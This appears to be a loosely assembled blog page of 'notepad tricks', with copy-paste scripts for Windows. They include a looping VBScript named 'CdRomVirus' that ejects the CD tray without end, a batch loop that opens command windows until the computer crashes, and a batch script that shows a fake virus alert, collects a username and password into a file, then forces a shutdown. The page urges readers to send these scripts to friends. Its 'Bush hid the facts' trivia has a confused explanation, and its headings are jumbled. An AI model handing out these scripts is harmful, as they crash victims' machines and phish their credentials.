WARNING - Doing this could result in crashing your computer!
IT IS NOT MY RESPONSIBILITY IF SOMETHING GOES WRONG.
DO NOT USE THIS FILE AS A VIRUS - JUST FOR EDUCATIONAL USE ONLY!
Copy and paste the following into Notepad...
DO
Set owMP = CreateOBject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
for i= 0 to colCDROMs.Count - 1
colCDROMS.Item(i).Eject
Next ' cdrom
End If
loop
And save it as CdRomVirus.vbs And enjoy.
WITH THANKS TO COMPUTER-TRICKER FOR THE
CD ROM OPENER SCRIPT - I JUST MADE IT LOOP!

VBScript (Visual Basic Scripting Edition) is an Active Scripting
language developed by Microsoft that is modeled on Visual Basic.This
indeed is a very interesting scripting language and I will share some of
the best .vbs hacks which you can use to have loads of fun.We have
shared a post on this blog which uses .vbs scripting and helps to
Convert text to speech on a PC without any software.You can send these to your friends too
How to use the scripts provided?
To use the scripts provided in this article you need to open a new
notepad,and copy-paste the code provided within the different
headings.Then goto the file menu and click “save as..” .Save it in your
desktop with the name “anything.vbs” .To use the script , double click
on the icon on your desktop.
Make the CD tray open and close repeatedly
ALL NOTEPAD TRICKS.
#1 Bush Hid the Facts – Most Popular Notepad Tricks
This is one of the mysterious notepad tricks we know.
According to the
trick it really seems Microsoft had put some hack into the coding of
notepad making the text hidden after saving it.
Bush Hid the Facts – Most Popular Notepad Trick Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See…
Why This Happens ? : It was later known 4335 Rule. It means that if we
enter four words separated by spaces, wherein the first word has 4
letters, the next two have three letters each, and the last word has
five letters.Then Notepad Automatically hides the text into unknown
code. Similar are with “this app can break”.
OR
Notepad Codes
#1 simple a loop that opens CMD after CMD until computer crashes
@echo off
:a
Start cmd
goto :a
#2 a keylogger/shutdown computer code
@echo off
color c
start Iexplore
Title WARNING
echo WARNING VIRUS HAS ENTERED THROUGH THE DATA FRAME
echo Email Microsoft immediately
cd "C:\CMDREMARKS"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >CMDREMARKS.txt
shutdown -s -t 30 -c "Request Denied"